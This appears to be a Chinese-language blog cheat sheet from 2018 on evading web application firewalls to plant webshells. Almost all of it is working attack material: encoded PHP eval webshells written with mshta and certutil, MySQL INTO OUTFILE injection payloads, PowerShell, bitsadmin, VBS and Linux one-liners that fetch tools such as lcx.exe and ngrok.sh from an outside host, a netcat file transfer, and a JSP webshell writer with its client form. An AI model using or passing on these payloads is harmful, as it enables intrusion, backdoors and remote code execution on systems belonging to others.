bypass-waf-put-Webshell

凡是不能把我毁灭的,都将使我更强

利用常见的系统工具进行编码解码绕过某些防护软件写入webshell

0x01 编码绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# mshta vbscript:createobject("scripting.filesystemobject").createtextfile("yijuhua.txt",2,ture).writeline("PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+Cg==")(window.close)
# certutil -decode yijuhua.txt shell.txt
# type shell.txt
# echo 48 65 6C 6C 6F 2C 57 6F 72 6C 64 21 >hex.txt
> 生成 hex.txt,机器码对应的内容是 Hello World!
# certutil -decodehex hex.txt bin.txt
> Hex解码
# certutil -encode bin.txt Encode.txt
> Base64编码
# certutil -decode Encode.txt Decode.txt
> Base64解码

0x02 将命令转换为Powershell兼容的编码字符串

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# command
echo "iex(command)" | iconv --to-code UTF-16LE | base64 -w 0
# powershell一行命令下载1
powershell $client = new-object System.Net.WebClient;$client.DownloadFile('https://baidu.com','file.name')
# powershell一行命令下载2
Invoke-WebRequest -uri 'https://baidu.com' -OutFile 'file.name'
# 有时候需要写批处理实现
echo powershell $client = new-object System.Net.WebClient;$client.DownloadFile('https://baidu.com','file.name') > 1.bat
# 注意在不同环境中特殊字符的转码
# Python
from base64
import b64encode
# Ruby
require "base64"
Base64.encode64('iex(command)'.force_encoding('UTF-16LE'))
b64encode('iex(command)'.encode('UTF-16LE'))

图片已损坏

1
2
3
echo '<?php @eval($_POST[cmd]);?>' | base64
echo PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+Cg== | base64 -D | tee yijuhua.txt
cat yijuhua.txt

图片已损坏

0x03 Mysql

利用条件:
root权限
GPC关闭(能使用单引号)
有绝对路径(读文件可以不用,写文件必须)
没有配置–secure-file-priv

1
2
3
4
5
1.union
id=1 union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>' into outfile 'C:\\phpinfo.php'%23
2.no union
id=1 into outfile 'C:\\yijuhua.php' fields terminated by '<? phpinfo(); ?>'%23

图片已损坏

0x04 存在命令执行echo

没有web物理路径写webshell,路径可以通过搜索文件得到,右键看源码随便找个的js文件

1
dir /s/b 驱动器号:\example.js 获取绝对路径

0x05

1
trebuchet.exe c:\1.txt c:\2.txt

lpk.dll劫持,mysql-udf导入

0x06 vbs脚本上传2

1
2
3
4
5
6
7
8
9
10
11
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>1.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>1.vbs
echo Post.Open "GET","http://baidu.com",0 >>1.vbs
echo Post.Send() >>1.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>1.vbs
echo aGet.Mode = 3 >>1.vbs
echo aGet.Type = 1 >>1.vbs
echo aGet.Open() >>1.vbs
echo aGet.Write(Post.responseBody) >>1.vbs
echo aGet.SaveToFile "1.html",2 >>1.vbs
start 1.vbs

0x07 Linux

1
2
3
4
5
6
7
wget https://04z.net -O 1.html
curl -o 1.html https://04z.net
python -c "import urllib;urllib.urlretrieve('https://04z.net', '1.txt')"
ruby -e "require 'open-uri';File.open('1.txt', 'wb') {|f| f.write(open('https://04z.net') {|f1| f1.read})}"
perl -e "use LWP::Simple;getstore('http://baidu.com', '1.txt');"
# 这个只能http,https的话需要LWP::UserAgent;
nc [server] nc -l 5678 > 1.tar [client]nc servre_ip 5678 < 1.tar

0x08 struts上传exp [win]

cmd远程下载

1
bitsadmin /transfer ChromeDownloadjob /download /priority normal http://04z.net/ngrok.sh %UserProfile%\Desktop\ngrok.sh

vbs下载

1
2
3
4
5
6
7
8
9
10
11
12
13
Download "http://04z.net/lcx.exe", "lcx.exe"
Function Download(strUrl, strFile)
Set xHttp = CreateObject("MSXML2.ServerXMLHTTP")
xHttp.Open "GET", strUrl,0
xHttp.Send()
Set bStrm= CreateObject("ADODB.Stream")
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile strFile, 2 '//overwrite
end with
End Function

jsp木马连接器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<html>
<head>
<title>JSP一句话木马客户端</title>
</head>
<div align=center>
<br><br>
<font color=red>专用JSP木马连接器</font>
<br><br>
<form name=get method=post>服务端地址<input name=url size=110 type=text>
<br><br>
<textarea name=t rows=30 cols=120>你提交的代码</textarea>
<br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form>
<br>服务端代码:<br>
<textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%></textarea>
</div>
</body>

本文为原创,转载请遵守本站的版本

更新于: 2018年9月20日 14:09